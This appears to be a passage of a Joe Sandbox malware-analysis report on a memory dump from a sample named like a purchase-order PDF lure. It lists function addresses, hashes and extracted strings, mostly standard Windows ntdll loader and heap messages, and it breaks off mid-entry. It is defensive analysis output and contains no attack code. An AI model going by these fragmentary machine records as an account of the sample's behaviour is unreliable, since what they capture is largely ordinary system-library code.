HEAP[%wZ]: , xrefs: 01680399, 016804A8, 016805D0, 01680675, 016806CC
HEAP: , xrefs: 016803A6, 016804B5, 016805DD, 01680682, 016806D9

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 5bbf1e420c6d35e74cf3dc52ac8524c125249fe93cd96b8356a902d1676aa3f2
Instruction ID: 952a84cf752d1f1698e996d4c21eb8a329c5a399545b1262bb2e9efe0e73620a
Opcode Fuzzy Hash: 5bbf1e420c6d35e74cf3dc52ac8524c125249fe93cd96b8356a902d1676aa3f2
Instruction Fuzzy Hash: A3D1ED31600686DFDB22EFA8C851AADBBF1FF89714F08894DF5459B352C7349989CB24

Function 016589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01658A3D
AVRF: -*- final list of providers -*- , xrefs: 01658B8F
VerifierDebug, xrefs: 01658CA5
HandleTraces, xrefs: 01658C8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01658A67
VerifierFlags, xrefs: 01658C50
VerifierDlls, xrefs: 01658CBD

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: d354346c4f2cb0ac1f7ae0a32c337807201f63c4946ddce28e8958b186c0bff9
Instruction ID: 207fe2dfbc1ec9347ce3a6469a04cc8312342e603048b83a447dc3160d4f552d
Opcode Fuzzy Hash: d354346c4f2cb0ac1f7ae0a32c337807201f63c4946ddce28e8958b186c0bff9
Instruction Fuzzy Hash: 13910E72641706EFD362DF6A8C80B6A77EDBB94B14F04455CFE42AFA81D730A8018795

Function 015DEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

{, xrefs: 01634643
T, xrefs: 015DEB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 015DEB6C
, xrefs: 015DF299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 015DEB58
R, xrefs: 015DEB62

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: f4afea5ca0398809f4ab676845d1825293480a174c707a7fc452bd70c70fe94b
Instruction ID: 278846a1f4309b6946608fe13122c933d1558eacd5dbc8fb870ef9af6f088a22
Opcode Fuzzy Hash: f4afea5ca0398809f4ab676845d1825293480a174c707a7fc452bd70c70fe94b
Instruction Fuzzy Hash: 70A21774A0562A8FDB74DF19CC887ADBBB5FB85304F1442EAD909AB251DB309E81CF40

Function 016063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 016441FE
Delaying execution failed with status 0x%08lx, xrefs: 01644258
_LdrpInitialize, xrefs: 016440DF, 01644141, 01644205, 0164425F
minkernel\ntdll\ldrinit.c, xrefs: 016440E9, 0164414B, 0164420F, 01644269
Process initialization failed with status 0x%08lx, xrefs: 0164413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 016440D8

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 7e486153c935c4d272732c9f52971c55bdd7c4db9cd10cb783a93e139453bffe
Instruction ID: 08b7e08c2e46199f3e99f26790becc0ab8f9b9ac172502a319dac44364d20d97
Opcode Fuzzy Hash: 7e486153c935c4d272732c9f52971c55bdd7c4db9cd10cb783a93e139453bffe
Instruction Fuzzy Hash: CB911471B013129FEB2ADF58DC46BBB7BA2FF40B14F15801CE9016B381DB60A811C7A9

Function 015C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01629A11, 01629A3A
LdrpInitShimEngine, xrefs: 016299F4, 01629A07, 01629A30
apphelp.dll, xrefs: 015C6496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016299ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01629A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01629A2A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 00e609b032b6a7e115ef3d8d8df5c9026d0849003ff25262c3df00ad787b916c
Instruction ID: c032676b8627e62ace0d91feb2f144ca6651c9d76f80d965713c5934c51daf8a
Opcode Fuzzy Hash: 00e609b032b6a7e115ef3d8d8df5c9026d0849003ff25262c3df00ad787b916c
Instruction Fuzzy Hash: 4751E1712087119FE724DF64DC85BAB77E8FBC4B48F40491DE9859B250DB70E904CBA2

Function 01602674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016421BF
SXS: %s() passed the empty activation context, xrefs: 01642165
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0164219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01642180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01642178
RtlGetAssemblyStorageRoot, xrefs: 01642160, 0164219A, 016421BA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: ba62ca24eeca52eb7a4c2236e1e0f8bf822b08573daf98f76049b2226dbbaf09
Instruction ID: df5c18f2af716b30514d98c6047cafa249326d016dd84a5d537f77e3c242b787
Opcode Fuzzy Hash: ba62ca24eeca52eb7a4c2236e1e0f8bf822b08573daf98f76049b2226dbbaf09
Instruction Fuzzy Hash: 0C314876F4021177F7228A9A9CA5FAB7B79EF94A80F15405DFB047B280D7709E01C7A1

Function 0160C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 016481E5
minkernel\ntdll\ldrinit.c, xrefs: 0160C6C3
LdrpInitializeProcess, xrefs: 0160C6C4
LdrpInitializeImportRedirection, xrefs: 01648177, 016481EB
Loading import redirection DLL: '%wZ', xrefs: 01648170
minkernel\ntdll\ldrredirect.c, xrefs: 01648181, 016481F5

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 0be2365b53a9c58ecf22cea90ca64166d68c0d6c0dd9ce969add412fe29635f9
Instruction ID: ecc00595f1d75cca7eab0e2e89573a26ce74ab7abd34ace245a2292db2cd578f
Opcode Fuzzy Hash: 0be2365b53a9c58ecf22cea90ca64166d68c0d6c0dd9ce969add412fe29635f9
Instruction Fuzzy Hash: C831FF716447029FC324EA68DD86E2BBBA5BF94B10F05065CF981AB391E620EC04C7A2

Function 0161096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01612DF0: LdrInitializeThunk.NTDLL ref: 01612DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610D74

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: fa59496bd8542421f78b1931a914fc26bca662aa2a6ac3cc4ee196cd4a8a4420
Instruction ID: f77c40b0ee8fe5d168f60993b585c568c41a2908285222944f6c0fa1182f3f65
Opcode Fuzzy Hash: fa59496bd8542421f78b1931a914fc26bca662aa2a6ac3cc4ee196cd4a8a4420
Instruction Fuzzy Hash: 4C426B75900715DFDB21CF28CC80BAAB7F5BF48314F1885A9E989EB245D770AA85CF60

Function 015DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 015DA3E7
6, xrefs: 015DA3F7
LdrResFallbackLangList Enter, xrefs: 015DA3EF
LdrResFallbackLangList Exit, xrefs: 015DA3FF

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 6314c147566f5e3f9a214776b71d1fd8c0f976b1ec2ebb36f9fefb1989ff1198
Instruction ID: efb07aaefb91bd4066249e91879dcdfd3e473c3069a7f3b9ed03acf5881a27ee
Opcode Fuzzy Hash: 6314c147566f5e3f9a214776b71d1fd8c0f976b1ec2ebb36f9fefb1989ff1198
Instruction Fuzzy Hash: 4AC165755083828FDB21CF68C444B6BBBE4BF84704F04896EF9968B251E774CA49CB66

Function 01608402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01608421
LdrpInitializeProcess, xrefs: 01608422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0160855E
@, xrefs: 01608591

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: f1abc78098b79ee60da39d80a2a0e162be38f317aa608a54dba33b0718e972cc
Instruction ID: 59944b8c8c1456663656474180d0f56e52deb995272110f84f95f3b3a6d0ed7c
Opcode Fuzzy Hash: f1abc78098b79ee60da39d80a2a0e162be38f317aa608a54dba33b0718e972cc
Instruction Fuzzy Hash: 1C91AB71948346AFD722DE25CC91EABBAECBF84744F44092EFA8597181E330D904CB66

Function 0160273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016422B6
SXS: %s() passed the empty activation context, xrefs: 016421DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016421D9, 016422B1
.Local, xrefs: 016028D8

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: a675a2877f98bd170df1fb0cedacd992827a3accd96477779a8b8814773d32c7
Instruction ID: 94f2e889ea092abc76f080262eb3a1647f474771911344da2cdc4a8fd47744e0
Opcode Fuzzy Hash: a675a2877f98bd170df1fb0cedacd992827a3accd96477779a8b8814773d32c7
Instruction Fuzzy Hash: E3A1D531900219DBDB29CF59DC98BAAB3B5BF58354F2541EDE908AB391D7309E81CF80

Function 01604AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01643456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0164342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01643437
RtlDeactivateActivationContext, xrefs: 01643425, 01643432, 01643451

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 6709f9277ebbb15738b8362691c5b38d0390b03dc4f61598e6cc40d29c36d55e
Instruction ID: 7c8f149ca2fd339a42e925224934f1ff881e35319f71beeee13a0ca84f52829e
Opcode Fuzzy Hash: 6709f9277ebbb15738b8362691c5b38d0390b03dc4f61598e6cc40d29c36d55e
Instruction Fuzzy Hash: BD611232641A229FD73B8F1CCC81B6AB7E5BF80B50F14852DEA559B380DB30E841CB95

Function 015D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01631028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0163106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01630FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016310AE

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 6045b667fcfe47123ab470f6ff8908a30ad29ee5b6b097672147192f917fcd2e
Instruction ID: f47e02d50df4f761f22b68efab23bda4af12ca11fce554fc2a69c4ccc298e1ce
Opcode Fuzzy Hash: 6045b667fcfe47123ab470f6ff8908a30ad29ee5b6b097672147192f917fcd2e
Instruction Fuzzy Hash: D271BCB19043059FCB21DF68CC84B9B7BA9BF95764F84086CF9488B24AD734D589CB92

Function 015F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 0163A9A2
apphelp.dll, xrefs: 015F2462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0163A992
LdrpDynamicShimModule, xrefs: 0163A998

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 4fc423d0f624248bef8ef8c47f300d5cd715acff708d836148475e07c95d8bfc
Instruction ID: 574b27f3dc56f85adccc4817696a72afc61ff4963dcf20720b55951992d199be
Opcode Fuzzy Hash: 4fc423d0f624248bef8ef8c47f300d5cd715acff708d836148475e07c95d8bfc
Instruction Fuzzy Hash: 07315772A00202EFDB319F9DDC85ABA7BB5FBC0B04F56405DE951AB345C7B0A892D790

Function 015E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015E327D
HEAP[%wZ]: , xrefs: 015E3255
HEAP: , xrefs: 015E3264

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 88c8f42843df72c2b0cf1a6a99bc70c897520f6771d7540c1f80bea33958739b
Instruction ID: 8223f460811620d8a4c159c5a25c3c0f2cc4cfabf23cf5fc46876cc2ce833095
Opcode Fuzzy Hash: 88c8f42843df72c2b0cf1a6a99bc70c897520f6771d7540c1f80bea33958739b
Instruction Fuzzy Hash: 7F92BC71E042499FDB29CF68C448BAEBBF5FF48300F188499E85AAB395D735A941CF50

Function 015E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 016350CA
HEAP[%wZ]: , xrefs: 016350AE
HEAP: , xrefs: 016350BD

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: caef5b4c84690ecc3b32039e7f6603511361671d3da244bd06891e0b5b5e908f
Instruction ID: 7f73723b03cefce74beeaf1da692ce3934ecdaea192dd47606829f4654a4904a
Opcode Fuzzy Hash: caef5b4c84690ecc3b32039e7f6603511361671d3da244bd06891e0b5b5e908f
Instruction Fuzzy Hash: 11F1AE70B00606DFEB29CF68C898B6AB7F5FF84704F1485A8E5569B381D774E981CB90

Function 015F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 015F6C24
, xrefs: 0163CA51

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: e12f33f19756ea708a6fd238f7845761cf9163af0a592a40e43c424a1e319a70
Instruction ID: 8d2db2bbfc6afa515623a8ca5c97eb3c31d05250c4011e409ee79f307cf9411e
Opcode Fuzzy Hash: e12f33f19756ea708a6fd238f7845761cf9163af0a592a40e43c424a1e319a70
Instruction Fuzzy Hash: E9C25E71A083419FE725CF28C841BABBBE5BFC8754F04892EFA899B251D734D845CB52

Function 015CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 015CA1C1
FilterFullPath, xrefs: 0162C2E6
\??\, xrefs: 0162C1E4

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: dba4a570bfb9cba9d3e467cb9ed8b9c9ae472bb218c2fcbf111bb89f1726164b
Instruction ID: 8bc3c06dc80826c243a5d69660bae3a453715a5af14a364c1deefb4afc7c35e9
Opcode Fuzzy Hash: dba4a570bfb9cba9d3e467cb9ed8b9c9ae472bb218c2fcbf111bb89f1726164b
Instruction Fuzzy Hash: 97A16B719016399BDB319F68CC88BAEB7B9FF44710F1001E9EA09AB250E7359E84CF54

Function 015F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0163A117
minkernel\ntdll\ldrinit.c, xrefs: 0163A121
Failed to allocated memory for shimmed module list, xrefs: 0163A10F

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 6f6cfb38776ffeaf48cda2d7058cb09986631a99e8f165059d090c3e3ddccf6a
Instruction ID: af8285b24232374f1bea6f15dc9972297fa7ea0ec55c34317227ace07b727c52
Opcode Fuzzy Hash: 6f6cfb38776ffeaf48cda2d7058cb09986631a99e8f165059d090c3e3ddccf6a
Instruction Fuzzy Hash: E371DD71A002069FDB25DFA8CD81BBEB7F6FB84204F18442DE942DB392E734A941CB54

Function 015E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01635335
HEAP: , xrefs: 01635342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0163534D

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 91c2d959a5c937c285231cc879f0939d7f2fea768c2cc0ed9febbc4a2094fe52
Instruction ID: abcb67c70ba2aaee64b925d5567e17a09c058c4bd3b1c305a175a96bb3539676
Opcode Fuzzy Hash: 91c2d959a5c937c285231cc879f0939d7f2fea768c2cc0ed9febbc4a2094fe52
Instruction Fuzzy Hash: F8617E70B003069FDB29DF28C844B6ABBE6FF45704F14855DE49A8F292D7B0E881CB95

Function 0160C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 016482E8
LdrpInitializePerUserWindowsDirectory, xrefs: 016482DE
Failed to reallocate the system dirs string !, xrefs: 016482D7

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 953740480f31fee6e144b228800ee8c913c43b23b3a90cd145d3bbcfa5ab66e0
Instruction ID: a58cefab2c3b28726643c4a49e0f7dbd708db43dce34d148186d5c3aaef31ae9
Opcode Fuzzy Hash: 953740480f31fee6e144b228800ee8c913c43b23b3a90cd145d3bbcfa5ab66e0
Instruction Fuzzy Hash: 6541F071550312AFC726EB68DC44B6B77E8FF84754F004A2AB949DB390EB74D8108B96

Function 0168C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0168C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0168C1C5
PreferredUILanguages, xrefs: 0168C212

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 2f203be837f82c67641619419718915a7883974fe42d3face9a6e2e5173d73c1
Instruction ID: 8119a7f6619b0abcf42ae2aa2b6c90e30a7eb3aebf406e60b3dd63d1f992e471
Opcode Fuzzy Hash: 2f203be837f82c67641619419718915a7883974fe42d3face9a6e2e5173d73c1
Instruction Fuzzy Hash: 94417471D0021AEBDF11EBD8CCA1FEEB7B9BB54704F14816AE609E7280D7749A44CB60

Function 01664144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01664160
@, xrefs: 01664225
LdrpResValidateFilePath Exit, xrefs: 01664172

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 35f89072d2114541da5f590323750bd37bb27cbd2776f3f334eff9a229797666
Instruction ID: 956ff22dc23efbe6d748ab0177aa51a81a859c07f16998bde7aca58fea19879c
Opcode Fuzzy Hash: 35f89072d2114541da5f590323750bd37bb27cbd2776f3f334eff9a229797666
Instruction Fuzzy Hash: 4241EF31A00659CBEB26DBA9CC44BADBBFDFF95340F24045AD901AF781DB359941CB50

Function 01654755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01654888
LdrpCheckRedirection, xrefs: 0165488F
minkernel\ntdll\ldrredirect.c, xrefs: 01654899

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 1ecd4ec2ede2208e4a0a97077b06b6e1e11cdd82d69dcb80010b9830d261dfc4
Instruction ID: a09772f71106e4bcef0d71204cf1a6c73e76e123504cbbdd0a44eee0d84d1afc
Opcode Fuzzy Hash: 1ecd4ec2ede2208e4a0a97077b06b6e1e11cdd82d69dcb80010b9830d261dfc4
